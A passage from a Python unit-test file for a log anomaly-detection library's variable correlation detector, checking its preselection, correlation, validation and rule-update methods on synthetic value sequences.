0.2] self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) values = [0.33]*3 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) values = [0.7] + [0.15]*2 self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) values = [0.25]*4 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) values = [0.58] + [0.14]*3 self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) def test5initialize_variables_with_matchDiscVals_preselection_method(self): """ This test case checks the functionality of the matchDiscVals preselection method. This test actually uses values instead of probabilities, but they are similar to the values used in test3. """ etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values_set1 = [i*0.1 for i in range(10)] values_set2 = [i*0.2 for i in range(7)] # an correlation should be detected even if the second list contains less values than the first. self.assertTrue(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) values_set2 = [i*0.3 for i in range(7)] # an correlation should not be detected if too many values are different. self.assertFalse(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) values = [] for i in range(58): stat_data = bytes(str(i * 0.1), 'utf-8') values.append(float(stat_data)) values_set1 = values values = [] for i in range(41): stat_data = bytes(str(i * 0.2), 'utf-8') values.append(float(stat_data)) values_set2 = values # an correlation should be detected if not too many values are different. self.assertTrue(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) values = [] for i in range(42): stat_data = bytes(str(i * 0.2), 'utf-8') values.append(float(stat_data)) values_set2 = values # an correlation should not be detected if too many values are different. self.assertFalse(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) def test6initialize_variables_with_random_preselection_method(self): """ This test case checks the functionality of the random preselection method. It tests all percentage_random_cors in [0.01..1.0[. For all paths the possible amount of combinations is 10. The expected number of correlations is rounded. For example with 0.05 <= percentage_random_cors < 0.15 exactly one combination is expected. The combinations also must not be repeated reversed and combinations with itself are not allowed. The used discrete data is for every path the same. """ t = time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random']) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(j), stat_data, stat_data, None) for j in range(5)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str(i).encode(), str(i).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) # test random correlation picking by using vcd.percentage_random_cors [0.01..1.0[ for i in range(1, 100): vcd.percentage_random_cors = i / 100 # out of 10 possible combinations exactly x should occur. x = i // 10 + (i % 10 >= 5) correlations = vcd.pick_cor_random(0) self.assertEqual(len(correlations), x, "Error at i = %d" % i) for corr in correlations: # one path must not correlate with itself. self.assertNotEqual(corr[0], corr[1]) # the same, reversed combination must not be in values. self.assertFalse([corr[1], corr[0]] in correlations) # test if a ValueError is raised when percentage_random_cors is out of range. self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=1.2) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=1.0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=0.0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=-1.2) def test7initialize_variables_with_intersect_presel_meth(self): """ This test case checks the functionality of the intersect_presel_meth flag with multiple preselection methods. These are 'excludeDueDistr' and 'matchDiscVals'. In the first case intersect_presel_meth=False and correlations can be detected successfully. In the second case intersect_presel_meth=True and no correlations are found because they are excluded in 'excludeDueDistr'. """ t = time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd_union = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=[ 'excludeDueDistr', 'matchDiscVals'], intersect_presel_meth=False) vcd_intersection = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_presel_meth=[ 'excludeDueDistr', 'matchDiscVals'], intersect_presel_meth=True) vcd_exclude = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['excludeDueDistr']) vcd_match = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['matchDiscVals']) var1 = ['a']*50 + ['b']*50 var2 = ['a']*90 + ['b']*10 var3 = ['c']*20 + ['d']*50 + ['e']*30 var4 = ['c']*50 + ['d']*50 for i, val in enumerate(var1): children = [MatchElement('2', var2[i].encode(), var2[i].encode(), None), MatchElement('3', var3[i].encode(), var3[i].encode(), None), MatchElement('4', var4[i].encode(), var4[i].encode(), None)] log_atom = LogAtom(val.encode(), ParserMatch(MatchElement('/', val.encode(), val.encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd_union.init_cor(0) vcd_intersection.init_cor(0) vcd_exclude.init_cor(0) vcd_match.init_cor(0) values_set = [[list(set(var1))] + [list(set(var2))] + [list(set(var3))] + [list(set(var4))]] self.assertTrue(sorted(vcd_union.pos_var_val), sorted(values_set)) # intersect_presel_meth=False -> correlations should be found. # the correlation has to be in at least one presel method. (OR-Statement) unique_list = deepcopy(vcd_exclude.pos_var_cor[0]) for cor in vcd_match.pos_var_cor[0]: if cor not in unique_list: unique_list.append(cor) self.assertEqual(len(unique_list), len(vcd_union.pos_var_cor[0])) values_set = [[list(set(var1))] + [list(set(var2))] + [list(set(var3))] + [list(set(var4))]] self.assertTrue(sorted(vcd_intersection.pos_var_val), sorted(values_set)) # intersect_presel_meth=True -> correlations should still be found. # the correlation has to be in both presel methods. (AND-Statement) unique_list = [] for cor in vcd_exclude.pos_var_cor[0]: if cor in vcd_match.pos_var_cor[0] and cor not in unique_list: unique_list.append(cor) for cor in vcd_match.pos_var_cor[0]: if cor in vcd_exclude.pos_var_cor[0] and cor not in unique_list: unique_list.append(cor) self.assertEqual(len(unique_list), len(vcd_intersection.pos_var_cor[0])) def test8initialize_variables_with_no_preselection_method(self): """ This test case checks the selection with no preselection method used. Also this test case checks the functionality of the Rel and WRel methods. For the data generation the main path '/' always contains (i % 10)*1 and child elements contain (i % 10)*1 for half of the time and (i % 10)*2 for the other half. The first half of the data contains 10 different values. These values are not combined with other values like in the second half of the data, which introduces 5 new values. Therefore 15 combinations exist (5+4+3+2+1=15). 10 correlations exist when '/' = i*1 -> child = i*1. In the second half 5 new correlations are added when '/' = i*1 -> child = i*2. """ t = time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, num_init=self.dataset_size) values1 = [] # generate the first half of the data with child elements being (i % 10) * 0.1. for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 1), 'utf-8') values1.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) values2 = [] # generate the second half of the data with child elements being (i % 10) * 2. for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 2), 'utf-8') values2.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values1 + values2)) pos_var_val = deepcopy(vcd.pos_var_val) # all child elements should contain data from values1 and values2. index = pos_var_val[0].index(values_set) del pos_var_val[0][index] # no other element should contain the united set of values1 and values2. self.assertRaises(ValueError, pos_var_val[0].index, values_set) # only values1 should be found, because the main path contains only data generated with (i % 10) * 1. self.assertEqual(pos_var_val, [[list(set(values1))]]) # test the functionality of the Rel and WRel methods # copy both lists to not modify the actual lists of the vcd. rel_list = deepcopy(vcd.rel_list) w_rel_list = deepcopy(vcd.w_rel_list) for rel in rel_list[0]: for r in rel: step = 2 for i in range(len(r)): # skipcq: PTC-W0060 key = (i % 20 >= 10)*10 + ((i % 10) * step) # search for the key k in the relation r or convert key to float if applicable. for k in r: if key == 0.0: break if k != 0.0 and k % key == 0: key = k break value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. if key == 0.0: self.assertEqual({key: 10}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and smaller than 10. elif key % 2 == 0 and key < 10.0: self.assertEqual({key: 4}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and greater or equal 10. elif key % 2 == 0: self.assertEqual({(key/2): 5}, value) else: raise ValueError('The %f: %f combination must not occur in Rel.' % (key, value)) # relations should be found in both directions and the count should be equal. cnt_half = 0 # for example key = 18.0 -> inner key = 9.0 cnt_double = 0 # for example key = 9.0 -> inner key = 18.0 for w_rel in w_rel_list[0]: for r in w_rel: step = 1.0 # search for the step size for k in r: if k >= 10.0: step = 2.0 if step == 1.0: cnt_half += 1 else: cnt_double += 1 for i in range(len(r)): # skipcq: PTC-W0060 key = (i % 20 >= 10)*10 + ((i % 10) * step) value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. if key == 0.0: self.assertEqual({key: 10}, value) # this if is only reached when step = 2.0. elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif step == 1.0: self.assertEqual({key*2: 5, key: 5}, value) elif step == 2.0: self.assertEqual({key/2: 5, key: 5}, value) else: raise ValueError('The %f: %f combination must not occur in WRel.' % (key, value)) self.assertEqual(cnt_half, 1) self.assertEqual(cnt_double, 1) def test9nonexistent_preselection_methods(self): """This test case checks if an error occurs, when using an nonexistent preselection method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['nonexistentPreselMeth']) def test10nonexistent_correlation_methods(self): """This test case checks if an error occurs, when using an nonexistent correlation method or empty list.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_cor_meth=['nonexistentCorDMeth']) def test11validate_correlation_rules_coverVals(self): """ This test case checks the functionality of the coverVals validation method. The validate_cor_cover_vals_thres is tested in the interval [0.1..1.0]. The data consists mostly of (i % 10) * 1 and every 7th value the child elements use (i % 10) * 2 as the condition (i % 7 == 0 and i != 0) is met. Comparing the count of values with h*10, as h is used to get the steps with 10%. If the count is smaller than h*10, no value must be found. """ t = time() # run test for every 10% of validate_cor_cover_vals_thres for h in range(1, 11, 1): etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_validate_cor_meth=['coverVals'], validate_cor_cover_vals_thres=0.7, num_init=self.dataset_size) # set new validate_cor_cover_vals_thres vcd.validate_cor_cover_vals_thres = h*0.1 # init and validate. This is needed as the ETD also needs to be initialized. for i in range(self.dataset_size): stat_data = str((i % 10)).encode() children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) vcd.rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13}}, {9.0: {9.0: 26}, 16.0: {16.0: 13}}]]] vcd.w_rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}, {9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}]]] vcd.pos_var_cor = [[[0, 1]]] old_rel_list = deepcopy(vcd.rel_list[0]) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_rel_list), len(vcd.rel_list[0])) self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) for i, rel in enumerate(vcd.rel_list[0]): for r in old_rel_list[i]: cnt = 0 for key in r: for val in r[key]: cnt += r[key][val] # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations. # h must be multiplied by 10 as it represents 10% steps. if cnt < h * 10: for val in rel: self.assertEqual({}, val) else: self.assertEqual(vcd.rel_list[0], old_rel_list) for i, rel in enumerate(vcd.w_rel_list[0]): for r in old_w_rel_list[i]: cnt = 0 for key in r: for val in r[key]: cnt += r[key][val] # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations. # h must be multiplied by 10 as it represents 10% steps. if cnt < h * 10: for val in rel: self.assertEqual({}, val) else: self.assertEqual(vcd.w_rel_list[0], old_w_rel_list) def test12validate_correlation_rules_distinctDistr(self): """ This test case checks the functionality of the distinctDistr validation method. The first collection of datasets is similar and therefore produces more correlations. The second collection of datasets is not so similar and the number of correlations is smaller. The expected correlations can not be compared directly, because the order of the correlations is not guaranteed with the distinctDistr validation method. To achieve the equality test, both correlation variables are compared to [[], [], []] after all existing correlations are removed. """ t = time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=['distinctDistr'], validate_cor_distinct_thres=0.05, num_init=self.dataset_size) # init and validate similar_data1 = ['a']*50 + ['b']*20 + ['c']*25 + ['d']*5 similar_data2 = ['a']*45 + ['b']*25 + ['c']*15 + ['d']*10 + ['e']*5 similar_data3 = ['a']*55 + ['b']*15 + ['c']*20 + ['d']*10 unsimilar_data1 = ['a']*50 + ['b']*20 + ['c']*25 + ['d']*5 unsimilar_data2 = ['a']*10 + ['b']*15 + ['c']*15 + ['d']*10 + ['e']*50 unsimilar_data3 = ['a']*25 + ['b']*15 + ['c']*50 + ['d']*10 for i in range(self.dataset_size): children = [MatchElement(str(1), similar_data2[i].encode(), similar_data2[i].encode(), None), MatchElement(str(2), similar_data3[i].encode(), similar_data3[i].encode(), None)] log_atom = LogAtom(similar_data1, ParserMatch(MatchElement( '/', similar_data1[i].encode(), similar_data1[i].encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) expected_similar_correlations = [[{ 'd': {'e': 5}, 'c': {'d': 10, 'c': 15}, 'b': {'b': 20}, 'a': {'b': 5, 'a': 45}}, { 'e': {'d': 5}, 'd': {'c': 10}, 'c': {'c': 15}, 'b': {'b': 20, 'a': 5}, 'a': {'a': 45}}], [{ 'd': {'d': 5}, 'c': {'d': 5, 'c': 20}, 'b': {'b': 15, 'a': 5}, 'a': {'a': 50}}, { 'd': {'d': 5, 'c': 5}, 'c': {'c': 20}, 'b': {'b': 15}, 'a': {'b': 5, 'a': 50}}], [{ 'e': {'d': 5}, 'd': {'d': 5, 'c': 5}, 'c': {'c': 15}, 'b': {'b': 15, 'a': 10}, 'a': {'a': 45}}, {'d': {'e': 5, 'd': 5}, 'c': {'d': 5, 'c': 15}, 'b': {'b': 15}, 'a': {'b': 10, 'a': 45}}]] for w_rel in vcd.w_rel_list[0]: for cor in w_rel: deleted = False for expected_similar_correlation in expected_similar_correlations: if cor in expected_similar_correlation: index = expected_similar_correlation.index(cor) del expected_similar_correlation[index] deleted = True break # if the correlation was not deleted an error is raised and the test fails. if not deleted: raise ValueError('Correlation %s could not be found in the WRel List.' % cor) self.assertEqual([[], [], []], expected_similar_correlations) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.1, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=['distinctDistr'], validate_cor_distinct_thres=0.05, num_init=self.dataset_size) for i in range(self.dataset_size): children = [MatchElement(str(1), unsimilar_data2[i].encode(), unsimilar_data2[i].encode(), None), MatchElement(str(2), unsimilar_data3[i].encode(), unsimilar_data3[i].encode(), None)] log_atom = LogAtom(unsimilar_data1[i], ParserMatch(MatchElement( '/', unsimilar_data1[i].encode(), unsimilar_data1[i].encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vtd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) expected_unsimilar_correlations = [[ {}, {'a': {'a': 10}, 'b': {'a': 15}, 'c': {'a': 15}, 'd': {'a': 10}, 'e': {'b': 20, 'c': 25, 'd': 5}}], [ {}, {'a': {'a': 25}, 'b': {'a': 15}, 'd': {'c': 5, 'd': 5}}], [ {'a': {'a': 10}, 'b': {'a': 15}, 'c': {'b': 15}, 'd': {'c': 10}, 'e': {'c': 40, 'd': 10}}, { 'a': {'a': 10, 'b': 15}, 'b': {'c': 15}, 'c': {'d': 10, 'e': 40}, 'd': {'e': 10}}]] for w_rel in vcd.w_rel_list[0]: for cor in w_rel: deleted = False for expected_unsimilar_correlation in expected_unsimilar_correlations: if cor in expected_unsimilar_correlation: index = expected_unsimilar_correlation.index(cor) del expected_unsimilar_correlation[index] deleted = True break # if the correlation was not deleted an error is raised and the test fails. if not deleted: raise ValueError('Correlation %s could not be found in the WRel List.%s' % (cor, vcd.w_rel_list[0])) self.assertEqual([[], [], []], expected_unsimilar_correlations) def test13validate_correlation_rules_distinctDistr_without_WRel(self): """This test case checks if an error occurs, when using the distinctDistr validation method without the WRel correlation method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_cor_meth=['Rel'], used_validate_cor_meth=['distinctDistr']) def test14nonexistent_validation_method(self): """This test case checks if an error occurs, when using an nonexistent validation method or empty list.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=['nonexistentValidateCorDMeth']) def test15update_and_test_correlation_rules_with_rel_correlation_method(self): """ This test case checks the functionality of the Rel correlation method in the update, correlation generation and test phases. The correlations are initialized with 10 values for each correlation and keys calculated with (i % 10) * 0.1. In the update phase keys are calculated with (i % 10) * 0.2. Due to that the existing value's count must stay the same in cases where new values are not created and new values must be created from 1.0 to 1.8. Values are increased by or created with a count of 10. """ description = 'test15VCD1' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['Rel'], num_init=self.dataset_size) self.analysis_context.register_component(vcd, description) self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True) for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] # existing values which are divisible by 2 and smaller than 10.0 should be updated. if key % 2 == 0 and key < 10.0: self.assertEqual({key: 20}, value) # new values which are divisible by 2 and greater than 10.0 should be created. # other values should stay the same as before. else: self.assertEqual({key: 10}, value) description = 'test15VCD2' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['Rel'], num_init=self.dataset_size) self.analysis_context.register_component(vcd, description) self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False) for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] # no new values should be created. self.assertFalse(key % 2 == 0 and key >= 10.0) # existing values which are divisible by 2 and smaller than 10.0 should be updated. if key % 2 == 0 and key < 10.0: self.assertEqual({key: 20}, value) # other values should stay the same as before. else: self.assertEqual({key: 10}, value) description = 'test15VCD3' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['Rel'], num_init=self.dataset_size) self.analysis_context.register_component(vcd, description) old_rel_list = self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False) # no values in the rel_list should be changed. self.assertEqual(vcd.rel_list[0], old_rel_list) description = 'test15VCD4' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['Rel'], num_init=self.dataset_size) self.analysis_context.register_component(vcd, description) offset = 200 self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset) # old correlations from child elements with the value being divisible by 2 should be deleted. The first ten correlations from the # initialization phase were not touched and should remain the same. The other correlation however should delete every value which # is divisible by 2. rel_list = deepcopy(vcd.rel_list[0]) # delete correlations from the init phase. for rel in vcd.rel_list[0]: if rel[0] == rel[1]: index = rel_list.index(rel) del rel_list[index] self.assertEqual(1, len(rel_list)) for rel in rel_list: # the order of the correlations is not guaranteed. if len(rel[0]) > len(rel[1]): rel0 = rel[0] rel1 = rel[1] else: rel0 = rel[1] rel1 = rel[0] for i in rel0: key = i value = rel0[key] self.assertEqual({key: 10}, value) for i in rel1: key = i value = rel1[key] # no values divisible by 2 should exist. self.assertFalse(key % 2 == 0) self.assertEqual({key: 10}, value) def update_or_test_with_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0): """Run the update or test of rel correlations.""" t = time() values = [] # generate the initialization data with child elements being (i % 10) * 1. for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 1), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) # test if the initialization contains only correlations with 10 values. for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] self.assertEqual({key: 10}, value) old_rel_list = deepcopy(vcd.rel_list[0]) values = [] # generate the update data with child elements being (i % 10) * 2. for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 2 + offset), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 2).encode(), str((i % 10) * 2).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.log_atom = log_atom vcd.update_rules[0] = update_rules vcd.generate_rules[0] = generate_rules vcd.update_or_test_cor(0) return old_rel_list def test16update_and_test_correlation_rules_with_w_rel_correlation_method(self): """ This test case checks the functionality of the WRel correlation method in the update, correlation generation and test phases. The correlations are initialized with 70% of the values having (i % 10) * 0.1 and 30% of the values having (i % 10) * 0.2. In the update phase the ratio is changed from 70:30 to 80:20. Thus the expected ratio is 75:25, when update_rules=True wihout offset. """ # This part tests if rules are updated when update_rules=True and generate_rules=True, however no new rules are generated as the # same data is passed on in the update process. description = 'test16VCD1' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=True and generate_rules=False. Therefore the assumptions of correlations is # the same as above, because there were no new correlations generated due to the same data being used. description = 'test16VCD2' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=False and generate_rules=False. No correlation should be changed. description = 'test16VCD3' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) old_w_rel_list = self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False) # no values in the rel_list should be changed. self.assertEqual(vcd.w_rel_list[0], old_w_rel_list) # This part tests if rules are updated when update_rules=True and generate_rules=False but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and no new correlations should be learned, because an offset # is added to all data. description = 'test16VCD4' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 10, float(offset): 2})) elif key >= 10.0: self.assertEqual({key / 2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) # This part tests if rules are updated when update_rules=True and generate_rules=True but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and new correlations should be learned, because an offset # is added to all data. description = 'test16VCD5' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 0, float(offset): 2})) elif key >= 10.0: self.assertTrue(value in ({(key-offset)/2: 2}, {key/2: 3}, {(key-offset)/2: 2, key: 8}, {key: 8})) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) def update_or_test_with_w_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0): """ Run the update or test of w_rel correlations. This method initializes the vcd with a distribution of 70% 0.1 and 30% 0.2. In the update phase the distribution is 80% 1 and 20% 2. """ t = time() values = [] # generate the initialization data with child elements being (i % 10) * 1. for i in range(70): stat_data = bytes(str((i % 10) * 1), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(30): stat_data = bytes(str((i % 10) * 2), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 10}, value) elif key >= 10.0: self.assertEqual({key/2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7})) else: self.assertTrue(value 